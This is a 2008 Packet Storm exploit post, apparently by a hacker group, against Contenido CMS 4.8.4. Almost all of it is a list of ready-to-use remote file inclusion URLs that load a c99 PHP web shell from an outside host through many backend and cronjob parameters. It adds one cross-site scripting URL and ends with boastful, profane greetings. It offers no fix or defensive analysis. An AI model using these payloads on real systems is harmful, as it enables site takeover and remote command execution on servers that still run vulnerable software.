contenideo-rfixss.txt

2008-06-16T00:00:00
ID PACKETSTORM:67324
Type packetstorm
Reporter RoMaNcYxHaCkEr
Modified 2008-06-16T00:00:00

Description

                                        
                                            `# Script Name : Contenido  
  
# Type Of Script : Content-Management  
  
# Version : 4.8.4 May Be Older Is Infected I Don,t See !!!  
  
# Download From : http://www.contenido.org/en/upload/versionen/Contenido_4.8.4.zip  
  
# Found : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]  
  
# My Homepage : WwW.4RxH.CoM & Member From Tryag Forum [ We Will Be Back Soon ]  
  
# Type Of Exploits : Multiple Remote Vulne [ RFI + XSS ]  
  
# Exploits:  
  
- This Multiple RFI In Different Files :  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=http://rxh.freehostia.com/shells/c99in.txt?  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=http://rxh.freehostia.com/shells/c99in.txt?  
  
- This Is XSS :  
  
http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/index.php?contenido=>">alert(41197.1507065509)%3B  
  
Also In Different Variable In "Belang" Also "username" By POST method  
  
# This All Above Shit Is EOF ......  
  
# Note : Fuck All Lamerz & Kids ( You Know What I Am Mean . Did You !!! )  
  
# Great To : Unknown Hacker , aLwHeEd , Tryag TeaM And Injector TeaM  
  
# rXh  
  
# bEST wISHES  
`